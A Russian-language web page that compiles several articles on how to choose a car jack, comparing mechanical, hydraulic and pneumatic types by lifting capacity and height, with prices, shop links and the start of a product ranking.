51 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Как подобрать домкрат по весу автомобиля

Что в машину, что в гараж: выбираем автомобильный домкрат

Пока на наших дорогах не перевелись гвозди, шурупы и прочие предметы, способные выпустить воздух из шины, домкрат в большинстве автомобилей еще долго будет востребован в качестве незаменимого помощника водителя. Шины, выполненные по технологии Runflat, — удел дорогих и престижных авто, весьма часто не комплектуемых запасным колесом. У нас же куда надежнее наличие в багажнике набора из балонника, «запаски» и домкрата, который гарантирует, что пробитая шина не станет камнем преткновения в пути.

Автопроизводители, естественно, в курсе вопроса, и новые авто для наших широт «запаской» («докаткой») и домкратом комплектуются уже с завода. Но если машина с рынка, а продавец сильно «хозяйственный», то после покупки вполне может оказаться, что за домкратом нужно идти в магазин или на тот же рынок. Что же приобрести?

Предложений много: от просто механических подъемных устройств до гидро- и пневмодомкратов, рассчитанных на серьезный вес и профессиональное применение. А еще есть домкраты, рассчитанные на определенные целевые группы типа охотников/рыболовов, часто использующих внедорожники, и на непосредственно фанатов езды по бездорожью, для которых Hi-Jack, лебедка и стропа все равно что для хирурга скальпель. Как и что выбирать в этом многообразии, читаем в обзоре ABW.BY.

Вариант первый — домкрат в машину. Если у вас обычная легковушка малого или среднего класса, вполне можно обойтись обычным механическим домкратом. Лучше всего начинать искать его на «разборках» одноименных марок и моделей машин. Покупка обойдется недорого, а в вашем авто пропишется домкрат, шедший в заводской комплектации. Для замены колеса в пути его вполне хватит.

Если заводской вариант найти не удалось, есть универсальные механические домкраты, предлагаемые в качестве альтернативы, но тут нужно учитывать некоторые нюансы. Среди них такие важные для домкрата характеристики, как высота подхвата, грузоподъемность и собственно высота подъема автомобиля.

Высота подхвата — это расстояние, с которого домкрат способен начинать подъем автомобиля. В большинстве случаев она равна высоте домкрата. Данный параметр весьма важен для автомобилей, у которых опорная точка под домкрат расположена низко над поверхностью, на которую будет опираться подъемное устройство.

С грузоподъемностью домкрата вроде бы все понятно, нужно лишь отдавать себе отчет в том, что в полевых условиях домкрат будет поднимать не весь вес автомобиля, а лишь его часть, а также что менять колесо, вероятнее всего, придется без подпорки. При этом не исключено, что для снятия со ступицы пробитого колеса, особенно после зимней эксплуатации, его нужно будет пару раз сильно ударить. Отсюда вывод — домкрат не должен работать на пределе своих возможностей. Опытные автомобилисты, подбирая грузоподъемность домкрата, обычно делят массу автомобиля на три, а то и на два, а не на четыре, как подсказывает логика.

Высота подъема тоже важная характеристика, так как для популярных нынче кроссоверов обычного легкового домкрата может попросту не хватить для отрыва колеса от земли. Тут, конечно, на помощь могут прийти доски либо резиновые проставки типа хоккейной шайбы, но лучше этот момент предусмотреть еще в ходе подбора домкрата.

Еще одна особенность механических домкратов кроется в их конструкции. Она может быть ромбовидной, либо Г-образной, либо вовсе как у классических «жигулей» и старых Mercedes. Преимущество первой — в незначительном смещении кузова/рамы автомобиля в горизонтальном направлении и достойные показатели устойчивости. За вторую — легкий вес и компактность, но необходимы навыки по установке подобного устройства, так как при подъеме оно смещает кузов автомобиля в строну его продольной оси. Третьи же и вовсе нормально работают лишь с машинами, имеющими специальные поддомкратники.

Второй тип домкратов — гидравлические, в которых в качестве рабочего тела используется жидкость. Поднимать они способны гораздо больше механических, поэтому активно применяются владельцами тяжелых машин и коммерческого транспорта. С высотой подхвата, грузоподъемностью и высотой подъема рекомендации здесь те же, что и у механических домкратов, а вот на конструкции и габаритах стоит остановиться отдельно.

Гидравлические домкраты бутылочного типа компактны и удобны в применении, особенно в условиях ограниченного пространства. Их ахиллесова пята — высокий вес и необходимость использования подпора на случай, если не выдержит один из клапанов, регулирующих распределение жидкости. А еще перевозить их во избежание течей рекомендуется в вертикальном положении. В остальном выбор подобного домкрата и для гаража, и в качестве машинного домкрата не на каждый день практически идеален при условии, что вас устроила высота подхвата.

Подкатные домкраты большей частью удел профессионалов. Их основной козырь — удобство использования при наличии достаточного пространства. Они не компактны, зачастую весят еще больше собратьев бутылочного типа, зато очень удобны и практичны при частом использовании, скажем, в шиномонтажах или мелких автомастерских. Многие современные модели подобных домкратов уже в своей конструкции имеют механические упоры-ограничители, которые предотвращают непроизвольное складывание домкрата, если из строя выйдет гидравлика, их вполне можно использовать без дополнительных подставок под авто при осуществлении длительных ремонтов подвески, суппорта или ступичного узла. Возить подобный девайс в автомобиле, безусловно, можно, но не очень рационально. Места он займет много, просто замена колеса в дороге того не стоит.

Реечные механические домкраты для любителей активного автомобильного отдыха заслуживают отдельного упоминания. Основное их достоинство помимо потенциальной возможности мелкого ремонта или замены того же пробитого колеса — возможность высокого подъема застрявшего автомобиля над препятствием. Отсюда и название Hi Jack, и использование домкрата в качестве элемента лебедки. Среди его достоинств — высокая грузоподъемность и большая высота подъема. К недостаткам стоит отнести большие габариты, высокий вес и необходимость наличия специальных навыков по работе с подобными устройствами.

Пневмодомкраты, в которых в качестве рабочего вещества используется воздух, к слову, в отличие от жидкости имеющий возможность сжиматься, наименее популярный и распространенный вид домкратов, особенно среди любителей. Здесь я бы остановился на домкратах-подушках, надуваемых с помощью либо компрессора, либо выхлопных газов автомобиля. На их стороне — малый вес, скромные габариты и большие опорные поверхности, но минусов куда больше. Это и возможность сжатия воздуха, и потенциальная возможность повреждения самого воздушного резервуара выступающими металлическими частями кузова, болтами или ветками и камнями на земле, из-за чего подушку подобного домкрата, прежде чем надуть, кладут не на землю, а на заботливо подложенный салонный коврик, а второй ковер располагают между подушкой домкрата и кузовом. Ремонт и замена колеса с их применением возможны лишь при использовании дополнительных упоров для автомобиля. Истинная же их стихия — бездорожье, когда машину нужно вызволить из грязевого плена либо когда вывешенными оказались сразу несколько ведущих колес, остро нуждающихся в том, чтобы под них положили сэнд-траки или просто бревно.

В заключении несколько слов о стоимости домкратов. На белорусском рынке подавляющее большинство из них имеет китайское происхождение независимо от марки и размера.

Стоимость механических ромбовых домкратов — 300.000-600.000 руб., выбор их более чем обширен.

Двухтонные домкраты бутылочного типа обойдутся покупателю от 220.000, 5-10-тонные — 400.000-500.000 рублей. Если поднимаемая масса исчисляется десятками тонн, готовьте 2-3 млн.

Цены на двухтонные подкатные домкраты стартуют с 550.000-570.000 руб., далее ценник зависит и от грузоподъемности, и от высоты подъема, и от упоминавшейся выше возможности механической фиксации домкрата. Про «аппетиты» продавцов тоже не забываем. В итоге верхняя планка для двухтонного домкрата — 1,5 млн. Вот такая «вилочка». По словам же бывалых шиномонтажников, высокая цена вовсе не гарантирует качества, как, впрочем, и цвет домкрата. На шиномонтажах подкатный домкрат — расходный материал. Профессиональное оборудование стоит намного дороже (около 200 у.е. за домкрат), окупить его в наших реалиях весьма непросто.

Реечный аналог Hi-Jack обойдется покупателю от 1,5 млн рублей, но если хотите поднимать много (4 т) и высоко (до 1,5 м), готовьте вдвое больше, и тогда производитель будет не из Китая, а из США.

Подушка-домкрат, надуваемая выхлопными газами, у белорусских продавцов редкий товар. В РФ ее стоимость эквивалентна 100 у.е.

Что приобрести — решать покупателю. Но чтобы выбор был осознанным, в первую очередь важно понять, зачем вам домкрат, как часто вы испытываете в нем необходимость, какое количество денег он вам сэкономит за год-два эксплуатации, например, при «переобувке» зимних шин на летние и наоборот.

Как выбрать автомобильный домкрат

Дата публикации: 18 октября 2018 .
Категория: Автотехника.

Домкрат должен быть в каждом автомобиле, так как в пути может произойти все что угодно. Если в глуши спустило колесо или машина просела, то не всегда можно полагаться на сотовую связь и расторопность сервисной службы. Приходится засучить рукава и самостоятельно решать проблему.

Раньше автовладельцам был представлен ассортимент всего из нескольких моделей надежных домкратов, поэтому выбор осуществлялся очень быстро. Сегодня на рынке можно найти огромное количество самых разных агрегатов всех цветов и габаритов, но, качество некоторых приборов оставляет желать лучшего. Поэтому стоит принять во внимание несколько важных показателей и купить лучшую модель.

Высота

Существует два типа этого показателя:

  • Минимальная высота подъема (также ее часто называют высотой подхвата). Этот показатель означает расстояние от земли до порогов авто при спущенных колесах. Если это значение не превышает 15 см, то у машины слишком маленький клиренс, соответственно выбирать домкрат придется очень внимательно (лучше приобрести модель подкатного типа).
  • Максимальная высота подъема. В этом случае речь идет о том, до какого уровня домкрат сможет поднять авто. Как правило, 30-50 см с лихвой хватает для того, чтобы поменять пробитое колесо или подобраться к рулевой рейке.

Если нужно приподнять машину выше, то придется подготовить подставки или воспользоваться более габаритным и мощным реечным домкратом или пневматическим. Как правило, поднимать нужно внедорожники, которые вязнут в грязи. Однако, если приспособление даже способно удерживать авто на большой высоте, нужно быть уверенным в том, что прибор сможет выдержать вес транспортного средства.

Грузоподъемность

Это одна из важнейших характеристик автомобильных домкратов. Если подобрать изделие неправильно, то есть риск не только сломать его, но и повредить автотранспортное средство или даже нанести вред человеку, находящемуся под машиной.

Перед покупкой изделия нужно уточнить точный вес ТС и прибавить к этому значению 200 кг (в машине находится запаска и многие другие вещи, также возможно когда-нибудь придется перевозить в багажнике тяжелый груз). Исходя из типа машины стоит выбирать определенные изделия:

  • Для легковушек обычно выбирают домкраты (чаще всего ромбического типа), которые способны поднимать 1,5-2 тонны.
  • Для грузовика нужен агрегат мощнее, поэтому нужно ориентироваться на грузоподъемность от 15 до 30 тонн. При расчете нужного параметра стоит обратить внимание на вес машины и ее грузоподъемность. Например, если КамАЗ может перевозить до 14 тонн груза и сам весит 10 тонн, то домкрат должен выдерживать минимум 24 тонны.

Полезно! Чем выше грузоподъемность домкрата, тем он дороже, поэтому нет смысла переплачивать, если машина не способна перевозить много груза.

Также нужно учесть то, как именно устройство функционирует.

Привод домкрата

Существует несколько разновидностей подъемных механизмов в зависимости от принципа их действия.

Механические

Это самые «древние» модели с простейшим принципом действия: автовладелец надавливает на рычаг, а домкрат приподнимает машину. Изделия этого типа самые дешевые, но и самые тяжелые в использовании. Поэтому они подходят в качестве «экстренного» варианта, но для постоянного использования (например, для работы в гараже или автосервисе) их уже практически не используют.

Механические домкраты бывают:

  • Ромбические. Отличаются устойчивостью, так как нагрузка направляет прямо в центр прибора. Благодаря этому автомобиль не «гуляет» в поднятом состоянии. Однако такие изделия, как и любые другие механические работают по принципу «винт-гайка», поэтому использовать их очень муторно и рекомендуется только владельцам машин весом до 1,5 тонн.
  • Реечные. Отличают огромной грузоподъемностью, поэтому подойдут для внедорожника. Однако это очень габаритные и тяжелые агрегаты.

Гидравлические

Это самая популярная категория подъемных механизмов. Внешне может показаться, что такой домкрат похож на механический, но, в гидравлических моделях есть специальная жидкость, которая выталкивает плунжер (их может быть и два) с грузом. Это означает, что для того, чтобы понять авто придется прилагать намного меньше усилий.

Гидравлические приспособления бывают нескольких типов:

  • Бутылочные. Грузоподъемность таких моделей может доходить до 100 тонн (есть варианты и для легковушек, способные поднимать по 2 тонны). Из минусов таких изделий стоит отметить очень маленькую опору. Даже внешне такой домкрат выглядит не слишком устойчивым. Кроме этого в процессе подъема авто может немного смещаться в стороны, в этом случае на механизм будет оказываться не вертикальная, а горизонтальная нагрузка. Это нередко приводит к тому, что домкрат и вовсе наклоняется и «уходит» под машину.

  • Подкатные (напольные). Это оптимальный выбор, так как в этом случае мы получаем компактный и легкий домкрат (обычно весит порядка 5 кг), который подойдет для авто с обычной или низкой «посадкой». Такие подъемные механизмы бывают большими и маленькими. Вторая категория пользуется наибольшей популярностью. При выборе маленьких домкратов нужно быть очень осторожным, так как их заявленная грузоподъемность не всегда совпадает с реальностью (если на упаковке заявлено 2 тонны, то вполне может оказаться, что устройство справляется только с 1,2-1,5 тоннами). Кроме этого они обычно способны приподнимать авто на 30 см, чего не всегда хватает для смены колеса. Поэтому стоит обратить внимание на более крупные гаражные домкраты с более «правдивой» грузоподъемностью и возможностью поднимать авто высоту до 50 см. Но, нужно быть готовым к тому, что весить такой агрегат будет порядка 30 кг или больше.

Пневматические

В таких моделях подъем груза происходит за счет сжатого воздуха (его получают из газовых баллонов, подключив агрегат к выхлопной трубе или благодаря специальным пневмосмесям). По мере наполнения камеры воздухом автомобиль плавно приподнимается (как на надувной подушке). Таким образом, автовладельцу или мастеру не нужно прилагать вообще никаких усилий. Однако стоят такие модели очень дорого, поэтому их чаще покупают строители, мастера сервисных автоцентров и те, кому часто приходится вытаскивать застрявшие в грязи внедорожники.

Также в продаже можно встретить электрические модели, работающие от блока питания. Обычно они не поднимают больше 2 тонн, отличаются высокой стоимостью и большим весом. Если речь идет о редком использовании, то покупать пневматический агрегат тоже нет смысла (только если вы не являетесь владельцем шиномонтажной мастерской). Оптимальным вариантом становится гидравлика. Однако и тут нужно держать ухо востро.

На что обратить внимание при выборе домкрата

Прежде всего нужно убедиться, что на приборе присутствует перепускной клапан. Он отвечает за сброс излишнего давления масла, в случае если домкрат сильно перегружается. Если такого клапана нет, то не удивительно, что он не справляется с заявленным в описании весом. Лучше такие изделия не покупать, так как, скорее всего, они были произведены в кустарных условиях.

Полезно! Если перепускной клапан отсутствует, то это может привести выдавливанию масла, прогибу штока и многому другому. В итоге можно сильно пострадать.

Обычно на перепускных клапанах присутствует надпись «do not adjust» (не регулировать). Это предупреждение означает, что клапан был отрегулирован на заводе, а самостоятельные поползновения «перепрошить» прибор приведут только к его поломке.

Не менее важно, чтобы изделие было выполнено из качественных материалов, которые надежно зафиксированы. Как правило, всем этим могут похвастаться только фирменные модели.

Что в машину, что в гараж: выбираем автомобильный домкрат

Пока на наших дорогах не перевелись гвозди, шурупы и прочие предметы, способные выпустить воздух из шины, домкрат в большинстве автомобилей еще долго будет востребован в качестве незаменимого помощника водителя. Шины, выполненные по технологии Runflat, — удел дорогих и престижных авто, весьма часто не комплектуемых запасным колесом. У нас же куда надежнее наличие в багажнике набора из балонника, «запаски» и домкрата, который гарантирует, что пробитая шина не станет камнем преткновения в пути.

Автопроизводители, естественно, в курсе вопроса, и новые авто для наших широт «запаской» («докаткой») и домкратом комплектуются уже с завода. Но если машина с рынка, а продавец сильно «хозяйственный», то после покупки вполне может оказаться, что за домкратом нужно идти в магазин или на тот же рынок. Что же приобрести?

Предложений много: от просто механических подъемных устройств до гидро- и пневмодомкратов, рассчитанных на серьезный вес и профессиональное применение. А еще есть домкраты, рассчитанные на определенные целевые группы типа охотников/рыболовов, часто использующих внедорожники, и на непосредственно фанатов езды по бездорожью, для которых Hi-Jack, лебедка и стропа все равно что для хирурга скальпель. Как и что выбирать в этом многообразии, читаем в обзоре ABW.BY.

Вариант первый — домкрат в машину. Если у вас обычная легковушка малого или среднего класса, вполне можно обойтись обычным механическим домкратом. Лучше всего начинать искать его на «разборках» одноименных марок и моделей машин. Покупка обойдется недорого, а в вашем авто пропишется домкрат, шедший в заводской комплектации. Для замены колеса в пути его вполне хватит.

Если заводской вариант найти не удалось, есть универсальные механические домкраты, предлагаемые в качестве альтернативы, но тут нужно учитывать некоторые нюансы. Среди них такие важные для домкрата характеристики, как высота подхвата, грузоподъемность и собственно высота подъема автомобиля.

Высота подхвата — это расстояние, с которого домкрат способен начинать подъем автомобиля. В большинстве случаев она равна высоте домкрата. Данный параметр весьма важен для автомобилей, у которых опорная точка под домкрат расположена низко над поверхностью, на которую будет опираться подъемное устройство.

С грузоподъемностью домкрата вроде бы все понятно, нужно лишь отдавать себе отчет в том, что в полевых условиях домкрат будет поднимать не весь вес автомобиля, а лишь его часть, а также что менять колесо, вероятнее всего, придется без подпорки. При этом не исключено, что для снятия со ступицы пробитого колеса, особенно после зимней эксплуатации, его нужно будет пару раз сильно ударить. Отсюда вывод — домкрат не должен работать на пределе своих возможностей. Опытные автомобилисты, подбирая грузоподъемность домкрата, обычно делят массу автомобиля на три, а то и на два, а не на четыре, как подсказывает логика.

Высота подъема тоже важная характеристика, так как для популярных нынче кроссоверов обычного легкового домкрата может попросту не хватить для отрыва колеса от земли. Тут, конечно, на помощь могут прийти доски либо резиновые проставки типа хоккейной шайбы, но лучше этот момент предусмотреть еще в ходе подбора домкрата.

Еще одна особенность механических домкратов кроется в их конструкции. Она может быть ромбовидной, либо Г-образной, либо вовсе как у классических «жигулей» и старых Mercedes. Преимущество первой — в незначительном смещении кузова/рамы автомобиля в горизонтальном направлении и достойные показатели устойчивости. За вторую — легкий вес и компактность, но необходимы навыки по установке подобного устройства, так как при подъеме оно смещает кузов автомобиля в строну его продольной оси. Третьи же и вовсе нормально работают лишь с машинами, имеющими специальные поддомкратники.

Второй тип домкратов — гидравлические, в которых в качестве рабочего тела используется жидкость. Поднимать они способны гораздо больше механических, поэтому активно применяются владельцами тяжелых машин и коммерческого транспорта. С высотой подхвата, грузоподъемностью и высотой подъема рекомендации здесь те же, что и у механических домкратов, а вот на конструкции и габаритах стоит остановиться отдельно.

Гидравлические домкраты бутылочного типа компактны и удобны в применении, особенно в условиях ограниченного пространства. Их ахиллесова пята — высокий вес и необходимость использования подпора на случай, если не выдержит один из клапанов, регулирующих распределение жидкости. А еще перевозить их во избежание течей рекомендуется в вертикальном положении. В остальном выбор подобного домкрата и для гаража, и в качестве машинного домкрата не на каждый день практически идеален при условии, что вас устроила высота подхвата.

Подкатные домкраты большей частью удел профессионалов. Их основной козырь — удобство использования при наличии достаточного пространства. Они не компактны, зачастую весят еще больше собратьев бутылочного типа, зато очень удобны и практичны при частом использовании, скажем, в шиномонтажах или мелких автомастерских. Многие современные модели подобных домкратов уже в своей конструкции имеют механические упоры-ограничители, которые предотвращают непроизвольное складывание домкрата, если из строя выйдет гидравлика, их вполне можно использовать без дополнительных подставок под авто при осуществлении длительных ремонтов подвески, суппорта или ступичного узла. Возить подобный девайс в автомобиле, безусловно, можно, но не очень рационально. Места он займет много, просто замена колеса в дороге того не стоит.

Реечные механические домкраты для любителей активного автомобильного отдыха заслуживают отдельного упоминания. Основное их достоинство помимо потенциальной возможности мелкого ремонта или замены того же пробитого колеса — возможность высокого подъема застрявшего автомобиля над препятствием. Отсюда и название Hi Jack, и использование домкрата в качестве элемента лебедки. Среди его достоинств — высокая грузоподъемность и большая высота подъема. К недостаткам стоит отнести большие габариты, высокий вес и необходимость наличия специальных навыков по работе с подобными устройствами.

Пневмодомкраты, в которых в качестве рабочего вещества используется воздух, к слову, в отличие от жидкости имеющий возможность сжиматься, наименее популярный и распространенный вид домкратов, особенно среди любителей. Здесь я бы остановился на домкратах-подушках, надуваемых с помощью либо компрессора, либо выхлопных газов автомобиля. На их стороне — малый вес, скромные габариты и большие опорные поверхности, но минусов куда больше. Это и возможность сжатия воздуха, и потенциальная возможность повреждения самого воздушного резервуара выступающими металлическими частями кузова, болтами или ветками и камнями на земле, из-за чего подушку подобного домкрата, прежде чем надуть, кладут не на землю, а на заботливо подложенный салонный коврик, а второй ковер располагают между подушкой домкрата и кузовом. Ремонт и замена колеса с их применением возможны лишь при использовании дополнительных упоров для автомобиля. Истинная же их стихия — бездорожье, когда машину нужно вызволить из грязевого плена либо когда вывешенными оказались сразу несколько ведущих колес, остро нуждающихся в том, чтобы под них положили сэнд-траки или просто бревно.

В заключении несколько слов о стоимости домкратов. На белорусском рынке подавляющее большинство из них имеет китайское происхождение независимо от марки и размера.

Стоимость механических ромбовых домкратов — 300.000-600.000 руб., выбор их более чем обширен.

Двухтонные домкраты бутылочного типа обойдутся покупателю от 220.000, 5-10-тонные — 400.000-500.000 рублей. Если поднимаемая масса исчисляется десятками тонн, готовьте 2-3 млн.

Цены на двухтонные подкатные домкраты стартуют с 550.000-570.000 руб., далее ценник зависит и от грузоподъемности, и от высоты подъема, и от упоминавшейся выше возможности механической фиксации домкрата. Про «аппетиты» продавцов тоже не забываем. В итоге верхняя планка для двухтонного домкрата — 1,5 млн. Вот такая «вилочка». По словам же бывалых шиномонтажников, высокая цена вовсе не гарантирует качества, как, впрочем, и цвет домкрата. На шиномонтажах подкатный домкрат — расходный материал. Профессиональное оборудование стоит намного дороже (около 200 у.е. за домкрат), окупить его в наших реалиях весьма непросто.

Реечный аналог Hi-Jack обойдется покупателю от 1,5 млн рублей, но если хотите поднимать много (4 т) и высоко (до 1,5 м), готовьте вдвое больше, и тогда производитель будет не из Китая, а из США.

Подушка-домкрат, надуваемая выхлопными газами, у белорусских продавцов редкий товар. В РФ ее стоимость эквивалентна 100 у.е.

Что приобрести — решать покупателю. Но чтобы выбор был осознанным, в первую очередь важно понять, зачем вам домкрат, как часто вы испытываете в нем необходимость, какое количество денег он вам сэкономит за год-два эксплуатации, например, при «переобувке» зимних шин на летние и наоборот.

Как выбрать домкрат

Домкрат – помощник автомобилиста в борьбе со многими неприятными ситуациями. Приподнимая транспортное средство, он позволяет водителю провести ремонт, заменить пробитое на трассе колесо или вывезти из колеи забуксовавший автомобиль. На рынке представлено несколько типов домкратов, отличающихся габаритами, принципом действия, характеристиками и стоимостью. Как не ошибиться при выборе устройства, подходящего именно вашему авто?

Виды домкратов

Назначение домкрата – поднять и зафиксировать груз на определенной высоте. Для работы подъемники оснащают разными приводами: механическими, гидравлическими или пневматическими.

Механический домкрат приходит в действие за счет прикладываемых человеком усилий. Чтобы заставить это устройство поднимать или опускать автомобиль, водителю придется вращать рукоятку или двигать рычаг. В зависимости от конструкции механические домкраты разделяются на винтовые и реечные.

В винтовом домкрате винт соединен с червячным редуктором. Он преобразует вращательное движение в поступательное и передает его гайке, заставляя устройство двигаться вверх или вниз. Такие подъемники могут иметь разную конфигурацию: вертикальную или ромбическую.

Винтовой домкрат ромбического типа состоит из четырех металлических профилей, соединенных сверху и снизу с опорными площадками. В середине изделия располагается винт с резьбой – при его вращении угол наклона профилей меняется, устройство принимает форму ромба и поднимает груз кверху.

Такие модели просты и надежны, отличаются компактностью и невысокой стоимостью. Высота подъема винтовых ромбических домкратов обычно не превышает 40 см, а максимальная нагрузка составляет 1,5-2 тонны, поэтому они востребованы в основном среди владельцев легковых машин.

Другой тип механического подъемника – реечный домкрат. Он состоит из опоры, вертикальной стойки-рейки с отверстиями, перемещающегося по ней подъемного механизма и рычага, приводящего устройство в движение.

Такие домкраты выдерживают нагрузку до 10 тонн и способны поднимать грузы на высоту, превышающую 1 метр. Устройство подходит не только для ремонтных работ: оно способно приподнять автомобиль и помочь ему выбраться из грязи на бездорожье. Крепить реечный домкрат можно не только под днище, но и к силовому обвесу. Если у машины пластиковый бампер, подъемник цепляют за колесный диск с помощью специальных крюков. Благодаря этим свойствам реечный домкрат стал незаменимым приспособлением для водителей, часто путешествующих по проселочным дорогам.

Конструкция гидравлического домкрата состоит из металлического корпуса с рабочей жидкостью (обычно маслом), одного или двух выдвижных плунжеров (поршней), нагнетательного насоса и клапанов. Чтобы привести в действие такую модель, водителю придется двигать рычаг – в отличие от механических домкратов, это практически не потребует усилий. Гидравлические подъемники делятся на два типа:

Бутылочный домкрат получил название благодаря своей форме, напоминающей большую металлическую бутылку. Такие модели устойчивы, а их грузоподъемность начинается от 2 и достигает 20 тонн – этого достаточно, чтобы поднять КамАЗ. А вот высота подъема у устройств небольшая – в пределах 50 см. Особенность бутылочных домкратов: специальные требования к эксплуатации. Водителю придется периодически проверять герметичность клапанов и следить за уровнем масла, перевозить и хранить подъемник только в вертикальном положении.

К гидравлическим моделям относится и подкатной домкрат. Его название тоже связано с внешним видом: подъемник напоминает низкую металлическую тележку с колесами, на которой установлен гидравлический плунжер, масляный насос и механический рычаг. Подкатной домкрат – удобное, но достаточно громоздкое приспособление, вес которого может достигать нескольких десятков килограмм. Устанавливать это устройство можно только на твердой ровной поверхности, поэтому его в основном используют в автосервисах и ремонтных мастерских.

Выпускают также пневматические домкраты. Их конструкция представляет собой подушку из плотного материала, которая поднимает машину, надуваясь при поступлении газа из баллона или выхлопной трубы автомобиля. Такая модель компакта (в сложенном виде), не требует усилий от водителя, может использоваться на любых покрытиях, поднимает вес до 4 тонн и подходит для машин с низким клиренсом. Главный недостаток пневматического домкрата – стоимость, которая существенно выше, чем цены на механические и гидравлические подъемники.

Технические характеристики

Выбирая домкрат, нужно не только определиться с типом привода, но и убедиться, что характеристики устройства подходят для вашего автомобиля. К самым важным из них относятся:

  • грузоподъемность;
  • высота подъема;
  • высота подхвата.

Грузоподъемность показывает, на какой максимальный вес груза рассчитан домкрат. Чтобы определить этот параметр, нужно посмотреть в ПТС значение «снаряженной массы» авто и прибавить сверху запас в 100-200 кг – ведь во время поломки в багажнике или кузове могут находиться тяжелые вещи.

Высота подъема – расстояние, на которое домкрат способен поднять транспортное средство. У большинства моделей этот параметр варьируется в пределах от 30 до 50 см, что вполне достаточно для замены колеса.

Высота подхвата – минимальное расстояние, с которого может работать подъемник. В первую очередь эта характеристика важна для машин с низким клиренсом (дорожным просветом), у которых расстояние от дороги до днища менее 10 см.

Критерии выбора

Чтобы совершить правильный выбор, водителю необходимо учитывать как характеристики домкрата, так и особенности своего автомобиля. Если вы владелец седана или хетчбека, путешествующий преимущественно по асфальтированным трассам, оптимальным решением станет покупка механического [url=»http://www.dns-shop.ru/catalog/17a90f6716404e77/domkraty/?p=1&i=1&f=bfhv&f=3owg]винтового домкрата ромбической формы. Благодаря небольшому весу и габаритам его удобно возить с собой, а грузоподъемности устройства вполне хватит для стандартного легкового авто.

Охотникам, рыболовам и любителям сафари на внедорожниках будет полезен реечный домкрат с большой высотой подъема. Он пригодится не только для ремонта, но и поможет выбраться из колеи даже завязшему по кромку дверей автомобилю – ведь конструкция такого подъемника позволяет цеплять его не только за днище, но и за силовой бампер.

Грузоподъемность реечных домкратов достаточно высока, а вот их устойчивость оставляет желать лучшего. По этой причине передвигающимся по трассам водителям микроавтобусов и малотоннажных грузовиков лучше приобрести удобный [url=»http://www.dns-shop.ru/catalog/17a90f6716404e77/domkraty/?p=1&i=1&f=bfhu&f=3owh&f=2-6]гидравлический бутылочный домкрат, выдерживающий нагрузку в пределах 2-6 тонн. Для более крупных грузовых транспортных средств выпускают [url=»http://www.dns-shop.ru/catalog/17a90f6716404e77/domkraty/?p=1&i=1&f=bfhu&f=3owh&f=8-20]бутылочные домкраты, способные поднимать от 8 до 20 тонн.

Для тех, кто занимается ремонтом в гараже, удачным приобретением станет [url=»http://www.dns-shop.ru/catalog/17a90f6716404e77/domkraty/?p=1&i=1&f=bfhu&f=3owi]подкатной гидроподъемник. Он прост в работе, но тяжел и габаритен, поэтому возить его с собой не слишком удобно.

Владельцы авто с низким клиренсом могут приобрести пневматический или ромбический винтовой домкрат – высота подхвата у некоторых из них составляет всего 9-10 см.

Если в выборе устройства решающую роль для вас играет стоимость, сориентироваться поможет следующая информация.

14 Лучших домкратов для автомобиля

При ремонте автомобиля, замене колес и других работах многие водители пользуются специальным подъемных механизмом – домкратом. Лучший домкрат для легкового автомобиля при необходимости легко поднимает транспортное средство. Автомобильный рынок предлагает подкатные домкраты различной грузоподъемности, изготовленные известными фирмами. Какое подъемное устройство лучше купить для своего авто, на чем остановить выбор? На этот и многие другие вопросы вы получите ответ после ознакомления с подкатными домкратами, вошедшими в топ-14 лучших моделей в каждой весовой категории.

Виды автомобильных домкратов

В зависимости от назначения, конструкции и принципа действия домкраты разделяются на несколько категорий:

  1. Переносные.
  2. Передвижные.
  3. Стационарные.
  4. Пневматические.
  5. Винтовые.
  6. Гидравлические.
  7. Подкатные и многие другие виды.

Попробуем разобраться, какой домкрат лучше для использования в условиях гаража. Подкатная конструкция отличается от стационарных механизмов, установленных в ремонтных автомастерских и на СТО. В сравнении с другими аналогами подкатной домкрат обладает точностью установки, автономностью, безопасностью эксплуатации. Такие механизмы отличаются компактными размерами. Они универсальны, могут работать в любых условиях как внутри помещений, так и под открытым небом. С их помощью возможно поднимать грузы даже с нулевой высоты.

Лучшие подкатные домкраты до 2 т

Lavita FJ-01PVC (Китай)

Данная модель гидравлического типа пользуется популярностью среди автомобилистов благодаря прочности конструкции, удобству пользования и прочим положительным качествам. Для удобства пользователей конструкцией подкатного домкрата Lavita FJ-01PVC предусмотрены: эргономичная рукоятка, переключатель режимов (опускание/подъем), съемная грузовая площадка, четыре колеса. Диапазон высоты подъема: от 130 до 295 мм.

  • Низкая цена.
  • Простота эксплуатации.
  • Малый вес изделия (5,9 кг).
  • Устойчивость против перекосов.
  • Механизм работает при любых температурах окружающей среды.
  • Кейс из прочного пластика.
  • Данная модель предназначена только для подъема, но не удержания груза.

GoodYear GY-PD-01K (США)

Подкатной домкрат с гидравлическим приводом чаще всего используется для ремонта авто, а также при проведении строительно-монтажных работ в быту. Модель GoodYear GY-PD-01K оборудована специальной опорной площадкой круглой формы, изготовленной из резины, чтобы не нанести вред порожку машины. Благодаря встроенной системе GY-PD-01K домкрат легко поднимает легковой автомобиль на необходимую высоту.

  • Прочность конструкции.
  • Симпатичный дизайн.
  • Универсальность.
  • Максимальный подъем груза на высоту 320 мм.
  • Плавность, легкость подъема.
  • Устойчивость на 4-х точках.
  • Съемная рукоятка.

Intertool GT0109

Домкрат гидравлический подкатной – идеальное решение для быстрого подъема легковых авто и других грузов весом до двух тонн. Модель Intertool GT0109 рассчитана на максимальную высоту в 385 мм. Конструкция представляет собой четырехколесную тележку с двумя передними поворотными колесами. К тележке в комплект прикладывается специальная рукоятка с обрезиненной ручкой для накачивания гидравлики.

  • Простота, удобство пользования.
  • Красивый дизайн.
  • Прочность изделия.
  • Надежность, долговечность.
  • Сравнительно большой вес изделия – 14 кг.
  • Устройство поднимает грузы на непродолжительное время.

IRON HAND IH-125300DP

Подкатной домкрат IRON HAND IH-125300DP популярен среди владельцев легковых автомобилей, минивэнов, внедорожников, легких автобусов, небольших грузовичков коммерческого назначения. Гидравлическое устройство очень удобно и безопасно в использовании, исправно выполняет функции по быстрому подъему грузов на необходимую высоту в гараже, на дороге, при любых температурах.

  • Легкая конструкция весом 6,3 кг.
  • Адекватная цена на изделие.
  • Безопасность, комфортность.
  • Гарантия от производителя действует в течение одного года.
  • Упаковочная коробка из картона.

Лучшие подкатные домкраты до 3 т

Torin T830020

